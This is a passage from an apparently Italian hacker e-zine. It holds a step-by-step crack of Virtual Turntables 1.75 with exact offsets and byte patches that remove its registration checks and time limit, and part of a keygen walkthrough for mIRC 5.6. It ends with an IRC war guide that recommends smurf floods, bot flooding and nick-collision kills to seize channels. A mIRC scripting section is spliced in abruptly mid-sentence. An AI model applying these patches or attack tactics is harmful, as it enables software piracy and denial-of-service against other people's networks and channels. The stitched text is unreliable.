(' so gia'' :P ');
(' Per quanto riguarda i molti GotoXY
(' grafica considerate che la
(' Ci tengo a precisare che ho
(' sia di codice che di logica ma non
(' molti altri eheheh');
GotoXY(8,14); writeln ('
gli Spippolatori con in testa');
GotoXY(8,15); writeln ('
quelli del NewBies Staff che magari');
GotoXY(8,16); writeln ('
e-zine, ai DiB, al S0ftProject con in');
GotoXY(8,17); writeln ('
LordFelix, alle BadLands, e in particolar');
GotoXY(8,18); writeln ('
che ha fatto per me.');
GotoXY(8,19); writeln ('
il suo "Supermercato dell''hacker"');
GotoXY(8,20); writeln ('
detto... e'' vero? hihihi)');
GotoXY(8,21); writeln ('
ULNTWH99 e ad Alfredo, amici');
GotoXY(8,22); writeln ('
un amico trova un tesoro".');
GotoXY(8,23); writeln ('
particolare a RigoR MorteM al');
GotoXY(8,24); writeln ('
tengo ancora x ricordo...');
GotoXY(8,26); readln;
end;
--- FINE COMMENTO ---
Dedico questo programma a: tutti
RigoR MorteM e Jamil, a tutti
adesso sono al numero 10 della
testa Spirit, Cavallo, Fusys e
modo a mia madre per tutto quello
Un augurio speciale a Chrome per
(si chiama cosi'' mi hanno
Infine un ultimo saluto al mitico
che confermano il detto "chi trova
Un ringraziamento molto
quale dico che il pacchetto lo
Ora che ho finito questo articolo, Dante e' ancora li' che fa il suo e volevo
cogliere l'occasione x dire che...HO FINITO PRIMA IO :PPPPPPPP...hihiihihihi
...e poi io sarei un "maturato"...tnx ai mie prof e un fU‡K alla mia prof di
mate che in confronto alien e' bello quanto pamela anderson ;)
PS: non scrivetemi x pigliarmi x il culo...bastano gia' quei 30-40 che lo
fanno gia' ;) quindi...ah un ultima cosa...ovviamente come al solito ogni
consiglio e' ben accetto come qualsiasi critica anke dura tanto dopo aver
passato la maturita' ho ricominciato a credere in un dio che...vi punira'
tutti ahahahahahhh
PSS: dedico questo articolo al mio amico Eugenio il miglior NewBies che
conosca (xche' se dico hacker dopo si riprende l'UpLink che m'ha prestato e
dopo che ci faccio con ll3???). Un saluto speciale a Federico, a Dante, a
DeVilNeT, a RigoR MorteM, a \sPIRIT\ e a tutti quelli che aiutano qualcuno
senza chiedere niente in cambio, quindi a tutti quelli che portano avanti
tutto il crazy world of internet indipendentemente dal fatto che buchino
server o meno e dal fatto che usino linux o windows...
Byez
N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°²
²°°°ÛÛ°°°°ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°²
²°°°ÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°²
²°°°ÛÛ°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°²
²°°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
HOW TO VTT 1.75
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
SOLITA PREMESSA: non sono un cracker, non sono un hacker, sono un newbies
come voi. Quindi se troverete in questo articolo qualche
imprecisione e/o qualke stronzata non venitevi a lamentare :)
Saluti: DantuzAliguz, nobo, harlok, yado, falcon, dev666,
lord, ecc . . .
Per questo quarto numero di newbies, tanto per cambiare, ho deciso di scrivere
un articolo sul cracking. Iniziamo subito senza perdere troppo tempo . . .
Oggi crakkeremo Virtual Turntables 1.75. Ho deciso di scrivere un articolo su
questo prog xche' mi ha incuriosito il suo sistema di protezione.
Gli strumenti necessari sono sempre i soliti: il mitico SI (che cmq lo useremo
poco xche' il lavoro l'ho gia' fatto io;), Windasm e Hiew
Installiamolo e per iniziare diamo un'okkiata al prog. All'avvio ci appare un
primo nag screen poi nel menu' appare un tasto register!. MMM ok. I problemi
sorgono quando cercheremo di disattivare il timer che dopo 20 min ci chiude
il prog !!
Ma procediamo con calma . . . per ora proviamo a togliere il nag e il tasto
register!
Apriamo windasm e disassebliamo il vtt.exe.
Clikkiamo su Functions/Imports. Ecco la lista di tutte le chiamate che il
prog effetua.
Naturalmente ci salta subito all'occhio quella kiamata
Devices.?CheckRegistered@@YAHXZ
Ci rediamo conto che il prog effettua questa kiamata in quattro punti che
riporto:
* Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h
:004122CC E851500100
Call 00427322
* Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h
:00417D50 E8CDF50000
Call 00427322
* Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h
:00417D85 E898F50000
Call 00427322
* Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h
:0041998B E892D90000
Call 00427322
Ma attenzione . . dopo ogni chiamata al device.dll il prog in tutte e 4 i
punti confronta eax con il valore 01.
Per far credere al programma di essere registato bastera' forzare in tutti e
4 i punti il jmp condizionato.
Procediamo modificando l'offset 122D8 da 74(je) in EB(jmp)
Quindi il je all'offest 17D58 da 74(je) EB(jmp)
Il je 17D8D da 74(je) EB(jmp)
e per finire il 0F al 19995 in E9 con un 83 al 19996, un 00 all'19997
e un 90(nop) all'1999A
Avviamo VTT ed ecco che il nostro amato programma parte senza quel fastidioso
Nag iniziale e il tasto register! nel menu.
Passiamo ora alla fase numero 2 (ben + complicata)
Se non avete capito niente fino ad ora . . . vi consiglio di rileggerlo con +
attenzione o se siete negati x il cracking passate pure al prossimo articolo.
Il programma dopo 20 min da quando viene aperto si kiude automaticamente
utilizzado probabilmente un timer interno.
Probabilmente esistono altri modi per arrivare alla soluzione, ma preferisco
procedere per ora in questo modo che credo sia il + facile da spiegare.
Avviamo l'SI e attiviamo un BPX su MessageBoxA
Quindi CTRL+D per uscire. Avviamo vtt e attendiamo i 20 min necessari (uufff
per perdere tempo provate a mixarvi qualke mp3 :))
OK 19 min . . . 20 !!
Premete F12 per uscire dall'user32, clikkate su ok poi F12 fino a quando non
vi trovate in qualkosa del tipo TMP1090.dll (il numero 1090 puo' anke
cambiare).
A questo punto vi chiederete: ma do' sta sto TMP1090.dll ????
Bhe ve lo dico io . . . e' un dll temporaneo che il programma decrypta e
posiziona nella temp di windows con un nome radom (ecco xche' vi dicevo che
il 1090 puo' cambiare).
Direte voi bhe apriamo sto file forziamo i jmp e il gioco e' fatto !! NO
Non si puo' fare !!
Il file temporaneo e' quello che si ottiene decryptando il file InitSound.dat
che si trova nella stessa dir di VTT. Noterete che la differenza tra il file
tmp e il initsound.dat e' di un solo byte ma il secondo essendo un dll
cryptato non e' possibile apriro col windasm e quindi modificarlo !!
Quando poi kiudiamo il vtt.exe il file tmp viene automaticamente cancellato
senza che noi ci accorgessimo di nulla.
Appreso questo serve un po' di ragionamento per riuscir a fregare il ben
studiato prog.
Bhe non avete voglia di ragionare ??? non avete tempo ??? allora ve lo dico
io . . .
Tutto quello che vi sto per dire e' il frutto di un'ispirazione . . .
Skematizzo il tutto per rendere + facile:
COSA FA VTT.EXE
controlla se registrato nel vtt.exe (jmp che abbiamo gia' forzato ...
non c'e' problem,a controllasse pure :)))
NEL DEVICES.DLL
preleva il file initsound.dll
lo decrypta
gli assegna un nome random
lo mette nella dir temp di windows
effettua una kiamata al file
ALL'INTERNO DEL FILE TEMPORANEO
controlla se il prog e' registato
se non lo e' avvia il timer
inizializza l'audio (PORC' PROPRIO QUI DOVEVA FARLO
????)
NEL DEVICES.DLL
cancella il file temp
Lo skema e' abbastanza chiaro . . . credo :))
Bhe se il fottuto del programma non inizializzasse l'audio nel file temporaneo
sarebbe bastato cancellare la kiamata al file stesso impedendo in ogni caso
che il timer venga avviato.
Ma cio' non e' possibile quindi cercheremo di optare x un'altra via . . .
Ora skematizza l'altra via:
ALTRA VIA:
controlla se registrato nel vtt.exe (jmp che abbiamo gia' forzato . . .
non
c'e' problema, controllasse pure :)))
NEL DEVICES.DLL
salta
salta
salta
salta
effettua una kiamata al file (eheh gia' decryptato e modificato che
noi avremo posizionato nell dir di vtt)
ALL'INTERNO DEL FILE TEMPORANEO
controlla se il prog e' registato
anke se non lo e' facciamo in modo che il timer non
venga avviato
inizializza l'audio (OK)
NEL DEVICES.DLL
NON cancella il file temp (xche' non e' + un temporaneo)
Tutto kiaro ????
Bhe vediamo ora come si puo' fare . . .
Prima di tutto procuriamoci il dll che il nostro mitico vtt ci decrypta e ci
mette nella temp di win. Quindi avviamo il prog, buttiamolo giu', apriamo il
gestione risorse e copiamoci il file tmpxxxx.tmp nella dir di vtt
rinominandolo in devilcrk.dll.
Ci okkuperemo dopo di questo file. Per ora procediamo con il devices.dll
facendogli saltare il processo del decrypt.
Procediamo pure con il Windasm.
Apriamo il file a diamo un'akkiata a Functions/Imports
* Reference To: KERNEL32.GetTempFileNameA, Ord:0163h
OOH MA KE BELLO !!
Clikkiamo due volte su KERNEL32.GetTempFileNameA:
* Referenced by a CALL at Address:
|:10006361
|
:10005E60 6AFF
push FFFFFFFF
:10005E62 64A100000000
mov eax, dword ptr fs:[00000000]
:10005E68 68D8830010
push 100083D8
:10005E6D 50
push eax
:10005E6E B828130000
mov eax, 00001328
:10005E73 64892500000000
mov dword ptr fs:[00000000], esp
:10005E7A E8211E0000
call 10007CA0
:10005E7F A144E60010
mov eax, dword ptr [1000E644]
:10005E84
:10005E85
:10005E87
:10005E88
:10005E89
:10005E8A
:10005E8C
:10005E8D
:10005E92
:10005E98
:10005E9F
:10005EA0
53
8BC8
55
40
56
85C9
57
A344E60010
0F851B020000
8D9424F0010000
52
6800010000
push ebx
mov ecx, eax
push ebp
inc eax
push esi
test ecx, ecx
push edi
mov dword ptr [1000E644], eax
jne 100060B3
lea edx, dword ptr [esp+000001F0]
push edx
push 00000100
* Reference To: KERNEL32.GetTempPathA, Ord:0165h
|
:10005EA5 FF1548900010
Call dword ptr [10009048]
:10005EAB 8D8424EC000000
lea eax, dword ptr [esp+000000EC]
:10005EB2 8D8C24F0010000
lea ecx, dword ptr [esp+000001F0]
:10005EB9 50
push eax
:10005EBA 6A00
push 00000000
* Possible StringData Ref from Data Obj ->"tmp"
|
:10005EBC 68CCE20010
push 1000E2CC
:10005EC1 51
push ecx
* Reference To: KERNEL32.GetTempFileNameA, Ord:0163h
|
:10005EC2 FF154C900010
Call dword ptr [1000904C]
Esaminiamo un po' cosa accade qui . . .
Il tutto inizia con una kiamata dal 10006361.
Nella stringa
:10005E92 0F851B020000
jne 100060B3
viene effettuato un controllo: e' gia' stato creato il file temp ???
Se no continua con il codice . . . nel caso contrario effettua il jmp.
Ma sikkome a noi non serve che il file venga creato forziamo il jmp
in modo tale ke il salto venga compiuto cmq in ogni caso.
Prendiamo l'offset (5E92) e proseguiamo con l'hiew.
Cerchiamo con F5 l'offset poi F3 per modificare il file e con
F2 modifichiamo il jne in jmp (attenzione nella riga successiva e'
necessario poi mettere un nop)
Riprendiamo il Windasm ed esaminiamo ora il codice dopo il jmp che riporto
qui:
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10005E92(C)
|
:100060B3 6840E50010
push 1000E540 <=====
* Reference To: MFC42.MFC42:NoName0010, Ord:04A9h
|
:100060B8 E8C91F0000
Call 10008086
* Reference To: KERNEL32.GetLastError, Ord:011Ah
|
:100060BD 8B1D50900010
mov ebx, dword ptr [10009050]
:100060C3 8BE8
mov ebp, eax
Ci troviamo a questo punto sulla stringa 100063B3
In questo punto il prog fa un push di 1000E540 dove si trova la
path del file temporaneo (sara' qualkosa tipo: c:\windows\temp\tmpxxxx.tmp
che a noi servira' modificare in devilcrk.dll)
Per far questo riapriamo il nostro sempre amato Hiew con F4 scegliamo
Hex quindi con F5 cerchiamo la stringa E540. Procediamo con la modica
con F3 quindi F8 e inserite nel campo ASCII devilcrk.dll
premete invio e poi F8. A questo punto vedrete sulla destra il testo inserito
F9 x salvare.
Potete anche provare a far partire vtt per verificare se avete fatto tutto
correttamente. Il programma dopo 20 min si kiudera' ancora ma la differenza
sara' che vtt non creera' piu' il file temporaneo e quindi andra' sempre a
rikiamare il nostro devilcrk.dll.
Opss . . . porc' . . . se kiudiamo il programma, vtt canellera' il file
devilcrk.dll credendo sia un file temporaneo. Procediamo eliminando
la chiamata che ci cancella il nostro benedetto file.
Quindi: windasm, devices.dll, functions, imports, mmmm
Ma guarda che bella kiamata al KERNEL32.DeleteFileA !!!
hihi clikkiamo 2 volte . . .
ci troviamo qui'
* Reference To: MFC42.MFC42:NoName0009, Ord:047Fh
|
:10006178 E8031F0000
Call 10008080
:1000617D A144E60010
mov eax, dword ptr [1000E644]
:10006182 48
dec eax
:10006183 A344E60010
mov dword ptr [1000E644], eax
:10006188 750A
jne 10006194
:1000618A 83C604
add esi, 00000004
:1000618D 56
push esi
* Reference To: KERNEL32.DeleteFileA, Ord:0057h
|
:1000618E FF1544900010
Call dword ptr [10009044]
<===Qui'
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10006188(C)
|
:10006194 5E
pop esi
:10006195 C3
ret
A questo punto sara' necessario cancellare questa kiamata
ma dobbiamo cancellare anke l'add esi,04 e il push dell'esi
altrimenti mandiamo in tilt il programma :))
L'offset della 1000618A e' 618A
Apriamo Hiew e noppiamo dalla 618A fino alla 6193 con il codice
eax 90 (nop)
Fatto questo, possiamo riaprire vtt, chiuderlo e constatare che il file
devilcrk.dll non viene + cancellato.
Sara' ora necessario crakkare il file devilcrk.dll affinke' non venga
avvito il timer.
Vediamo un po' che si puo' fare . . .
Aprima con Windams il file Refs/String data reference
"**** YOUR TIME LIMIT HAS NOW EXPIRED!! "
Clikkiamo 2 volte:
* Referenced by a (U)nconditional
|:10001A1A(C), :10001A53(C)
|
:10001A71 B801000000
:10001A76 5E
:10001A77 C3
or (C)onditional Jump at Addresses:
:10001A78
:10001A79
:10001A7A
:10001A7B
:10001A7C
:10001A7D
:10001A7E
:10001A7F
nop
nop
nop
nop
nop
nop
nop
nop
90
90
90
90
90
90
90
90
Exported fn(): DllCheckRegistered
:10001A80 E81B020000
:10001A85 8B0D80530010
:10001A8B 33C0
:10001A8D 85C9
:10001A8F 0F95C0
:10001A92 C3
mov eax, 00000001
pop esi
ret
- Ord:0001h
call 10001CA0
mov ecx, dword ptr [10005380]
xor eax, eax
test ecx, ecx
setne al
ret
:10001A93
:10001A94
:10001A95
:10001A96
:10001A97
:10001A98
:10001A99
:10001A9A
:10001A9B
:10001A9C
:10001A9D
:10001A9E
:10001A9F
90
90
90
90
90
90
90
90
90
90
90
90
90
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
* Referenced by a CALL at Address:
|:100019FA
|
:10001AA0 8B4C2404
mov ecx, dword ptr [esp+04]
:10001AA4 8B442408
mov eax, dword ptr [esp+08]
:10001AA8 6A00
push 00000000
:10001AAA 50
push eax
:10001AAB 8B11
mov edx, dword ptr [ecx]
:10001AAD 52
push edx
* Reference To: DSOUND.DirectSoundCreate, Ord:0003h
|
:10001AAE E89D070000
Call 10002250
:10001AB3 F7D8
neg eax
:10001AB5 1BC0
sbb eax, eax
:10001AB7 40
inc eax
:10001AB8 C3
ret
:10001AB9
:10001ABA
:10001ABB
:10001ABC
:10001ABD
:10001ABE
:10001ABF
:10001AC0
:10001AC6
:10001AC7
:10001AC8
:10001AC9
90
90
90
90
90
90
90
81ECE8030000
53
55
56
57
nop
nop
nop
nop
nop
nop
nop
sub esp, 000003E8
push ebx
push ebp
push esi
push edi
* Reference To: MFC42.MFC42:NoName0004, Ord:0497h
|
:10001ACA E887090000
Call 10002456
:10001ACF 85C0
test eax, eax
:10001AD1 7410
je 10001AE3
* Reference To: MFC42.MFC42:NoName0004, Ord:0497h
|
:10001AD3 E87E090000
Call 10002456
:10001AD8 8B10
mov edx, dword ptr [eax]
:10001ADA 8BC8
mov ecx, eax
:10001ADC FF527C
call [edx+7C]
:10001ADF 8BD8
mov ebx, eax
:10001AE1 EB02
jmp 10001AE5
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10001AD1(C)
|
:10001AE3 33DB
xor ebx, ebx
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10001AE1(U)
|
:10001AE5 68804F1200
push 00124F80
* Reference To: KERNEL32.Sleep, Ord:023Fh
|
:10001AEA FF15EC600010
Call dword ptr [100060EC]
:10001AF0 83C9FF
or ecx, FFFFFFFF
* Possible StringData Ref from Data Obj ->"**** YOUR TIME LIMIT HAS NOW
EXPIRED!! "
I jmp all'10001A1A e 10001A53 sono quelli che cerkiamo
:10001A1A 7555
:10001A53 751C
jne 10001A71
jne 10001A71
Ci bastera' modificare i jne degli offset E1A e E53 in je con il nostro hiew
Avviamo vtt . . . 5 10 20 30 min . . .
WoW il gioco e' fatto !!
X eventuali domande, crtitiche, minacce di morte, la mia mail e'
[email protected] sempre pronto a rispondere ad ogni vostro messaggio.
Alla proxima
DeViLNeT
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
GENERATORE DI CHIAVI X MIRC32 5.6
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Autore: cod
Oggetto: mIRC32 5.6
Obiettivo: Generatore di chiavi
Strumenti:
SoftICE 4.0
IDA 3.8a
Window Disassembler 8.93
Livello: BOOOO DECIDETE VOI
NOTA:
L'AUTORE NON SI ASSUME NESSUNA RESPONSABILITA' PER CIO' CHE FARETE DI QUESTO
DOCUMENTO... CESTINATELO E ACQUISTATE IL mIRC (in tal caso sarete SCEMI)
N.B.:
LE INFORMAZIONI CONTENUTE QUI SONO FRUTTO DELLE MIE FANTASIE PERVERSE E
DI QUELLE DEGLI AUTORI DI SOFT ICE E DI IDA
mIRC32 Š il pi— diffuso programma di IRC in ambiente Windows. Il programma
ha un costo di 20 dollari pari a circa 40.000 lire (per eccesso). Non Š una
gran cifra da sborsare e non venite a dire che il programma non Š utile.
Vogliamo acquistare tale programma, perchŠ siamo gente onesta (... spero voi)
quindi leggiamo la guida in linea... cosa dice?
Abbiamo due modi per spedire i soldi... mandandoli via posta ordinaria al
seguente indirizzo:
Khaled Mardam-Bey
Apt. 347,
56 Gloucester Road,
London SW7 4UB,
UK
... questo modo non Š tanto sicuro.. chiss… quando arriveranno... vediamo il
2. modo:
Registrazione on-line, Š richiesto un numero di carta di credito... be se
avete una carta di credito scegliete questa via e smettete di leggere.
Siete ancora qui ?
Allora avete lo stesso problema mio... niente carta di credito (non provate
con i generatori...) allora cosa possiamo fare? L'unico sarebbe crackare
il programma, ma ad ogni aggiornamento ci toccher… crackare! E' gi… perchŠ
la minima variazione a livello di codice sorgente pu• generare un file
eseguibile totalmente diverso!
Allora non lo crackiamo... facciamo un p• di reverse enginering
(non sapete che Š ? allora... reverse significa inverso
engin motore... o qualcosa del genere... quindi fare ci• che fa il programma
all'inverso)
Ma cosa ci pu• interessare a noi ? La procedura di registrazione, ed il
calcolo della PASSWORD.
Allora lanciamo il programma WDASM e disassembliamo l'eseguibile MIRC32.EXE
Cerchiamo la parola 'Sorry'... trovata ecco!
Andiamo un p• su nel codice e noteremo un salto condizionale... Andiamo
all'istruzione che effettua il salto e troviamo il seguente codice:
PUSH
PUSH
CALL
TEST
JE
DWORD
DWORD
XXXXXXXX
EAX, EAX
YYYYYYYY
*
*
*
*
*
Questa DWORD punta al seriale
Questa DWORD punta al nome
Chiama una funzione
Confronta EAX
Salta se EAX Š uguale a 0
Traduciamo questo codice in un linguaggio ad alto livello:
if ValidatePassword(Name, Password) = 0 goto error
ok ora andiamo ad analizzare la funzione CALL...
La prima cosa che fa questa funzione Š quella di chiamare un'altra funzione
che ritorna un numero intero:
name_len=strlen(Name);
if (name_len < 5) return 0;
Quindi se il nome inserito Š minore di 5 caratteri ritorna 0 e il programma
ci rimanda a error.
Subito dopo questo if troviamo un'altra funzione che ha come parametri
esattamente Name e Password...
chiameremo tale funzione GenerateKey...
new_key=GenerateKey(Name, Password);
if (new_key != 0) goto continue
else return 1;
Ma il valore new_key cosa contiene ? Potrebbe contenere la nostra password
quindi andiamo ad analizzare questa funzione!
La prima cosa che fa il programma Š quella di trovare il trattino nella
password per scomporla in due sub codici. Per questo viene usata la funzione
_strchr che richiede come parametri l'indirizzo della stringa da analizzare
e il carattere da cercare.
new_address=_strchr(Password,'-');
if (new_address == 0) return 0;
Password[new_address]=0;
first_key=atol(Password);
/* atol converte una stringa in intero a 32bit */
Password[new_address]='-';
second_key=atol(new_address+1);
Avete capito come fa a suddividere la password ?
Semmai new_address dovesse essere uguale a 0 il programma va in errore
Una volta che il programma ha salvate le due password in memoria nelle
variabili long utilizza la funzione _strlen(Name) per calcolare la lunghezza
Affinale non vi e' piu' nulla da kapire sul funzionamento degli
identifikatori e poi a tempo debito li analizzeremo uno per volta kuando
dovremo inserirli nella sezione remote, per ora potete dare uno sguardo
all'help e sfogliare la varie kategorie di ident. ma ripeto non serve a un
gran ke farlo...
009 *** USO DEI KOMANDI DI mIRC ***
Bene, benetton, vi lascio un kompito per kasa: aprite il vostro help del
mIRC e sfogliatevi la sezione *mIRC Commands* non e' necessario ke impariate
tutti i komandi, ma komunkue dateci uno sguardo, i komandi sono kome i
komponenti di un'auto, non ne potete kostruire una solo kon i karburatori
e le spazzole per i tergikristalli, kosi' per gli skript dentro non ci potete
mettere solo /echo /quit e /join dovrete metterci ben altro...
010 *** NELLA PROXIMA PUNTATA ***
Vedete di prokurarvi un server irc da installarvi perke' sara' essenziale.
Finalmente inizieremo a parlare di kome strutturare delle risposte agli eventi
e se ce la faccio vi spiego pure kome implementare alkune protezioni...
In kuest'art. avevo detto a Nobody88 ke vi avrei parlato gia' della
realizzazione di uno skript, e delle relative protezioni e automatismi, ma
skrivendo kuesto art., mi sono akkorto ke senza una base non sareste andati
molto lontano...
011 *** SALUTAGGi VARi ***
SALUTI ALLA MIA KREW:
-AnArChY per me sarai siempre l'anarkiko =))
-CrazyHorzo un'altro floddattero kome me...
-N0CE & Kaliforn & Kelvin KAxxO fateve senti'!!!
-agli altri un saluto generiko :P
SALUTI A GENZ VARIA:
-^S|{0rP|0 un 'ggiorno riusciremo ad ankontrarci =)))
-|guly- infinite tenkese per tu sai kosa ;)
-ghimlet se non mi avresti detto 4 mesi fa di prokurarmi
un portscanner non avrei mai studiato l'hack...
-micio2 azzo non ti riesko a bekkare piu' fatti senti' in email pliis =)
-SALUTO A _kuasi_ TUTTO #HACKERNOW [i bot mika li devo saluta'...]
byez genz byez
ENNARO [email protected]
Mekkanici Digitali Member
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
IRCWAR - FONDAMENTI
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Quando si parla di IRCWar ci si riferisce in genere a cose tipo takeover
di canali e cosi' via... per capire bene questi discorsi bisogna avere
una piccola base riguardo irc, i server irc, i netsplit e alcuni comandi
e modi di ircnet.
Diciamo che il terreno di battaglia principale dei takers e' lo split o il
desynch. I server irc splittano a causa del sovraccarico della rete. In
genere, prima e dopo lo split c'e' un periodo di desynch, cioe' di
desincronizzazione dei server. In questi periodi possono accadere strane
cose.. facciamo qualche esempio:
- Puo' accadere che un utente kicki un altro utente su un server, ma che su
un altro server risulti ancora che l'utente kickato stia dentro il canale.
Ovviamente l'utente che e' stato kickato legge ancora quello che gli altri
scrivono, a loro insaputa, ma lui non puo' comunque scrivere, in quanto
riceve il messaggio "Cannot send to channel".
- Se un canale e' opless (cioe' senza operatori) e avviene uno split tra
alcuni server, il taker si connette con un altro client sul server che e'
splittato e ottiene l'op sul canale, in quanto e' l'unico presente. Al
rejoin dei server, nessuno deoppera' il taker poiche' solo lui avra' l'op.
- Quando due server splittano, si puo' trovare il modo di killare le persone
a noi sgradite. Ad esempio, se il nostro "nemico" ha il nick Techno[K] (uno a
caso ;D) e il suo server splitta, noi potremo joinare il server che lui non
riesce a vedere e dovremo usare il suo nick. Al rejoin dei server, io e il
vero Techno[K] veniamo killati dai server per nick collision, in quanto irc non
consente due nick uguali. Se Techno[K] era op su un canale, ovviamente non lo
avra' piu' quando rijoinera' perche' disconnesso da irc.
Queste sono alcune delle tecniche principali per ottenere un canale. Ovviamente
se questo canale e' mantenuto da un certo numero di bot, la cosa sara' molto
piu' difficile. In questi casi, dobbiamo osservare bene il canale e capire come
i bot funzionano, a quali server sono connessi, e cosi' via, e dovremo
prepararci
bene al take. Se si ha la possibilita' di smurfare e se si e' capaci, ve lo
consiglio vivamente :)
Per riuscire a fare take del canale si puo' operare in questo modo:
- Far collidere i nick, come spiegato in precedenza, ma questo puo' andar bene
solo se i bot sono pochi e se non sono configurati in modo che cambiano nick
ogni
volta che c'e' uno split.
- Floodare o smurfare i bot, usando opportune tecniche... lo smurf e' sicuro, il
flood dei bot invece dipende soprattutto dalla botnet sotto esame. Se essa e'
configurata bene state certi che non cadranno mai i bot floodandoli con migliaia
di
scritte o con join o con altre cose. Lo smurf e' sicuro, come dicevo, pero' e'
piu'
difficile da realizzare. Occore una shell decente da cui smurfare, degli ottimi
broadcast e anche bravura quindi non e' per tutti... ;)
- Se notate che i bot oppano degli utenti appena essi entrano nel canale,
cercate di
far cadere colui che e' stato oppato e fottetegli il nick e l'ident. Il bot in
qualche caso vi oppera'... e voi sarete padroni di tutto... ovviamente dovrete
essere veloci a deoppare e se vi portate alcuni amici e' anche meglio. E'
inutile
dire che dovrete deoppare prima i bot e i cazzoni con gli script lamer, perche'
sono
loro che potrebbero kickarvi per massdeop.
Alcuni altri consigli e raccomandazioni per l'ircwar:
- Dovete sempre preparare tutto prima di farlo... se dovete fare un mass deop
osservate bene la situazione, ed e' lo stesso anche per le altre operazioni.
- E' ovvio che possedere alcuni bot fa comodo, non devo dirvelo io :) usate
anche
delle tcl buone se prevedete molti attacchi al vostro canale.
- Se riuscite a takare un canale, tenetelo chiuso per uno / due giorni... questo
tempo sara' necessario a far raffreddare le testoline dei padroni precedenti, e
servira' anche a configurare bene il canale con i relativi bot.
St0rM BriNgeR
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
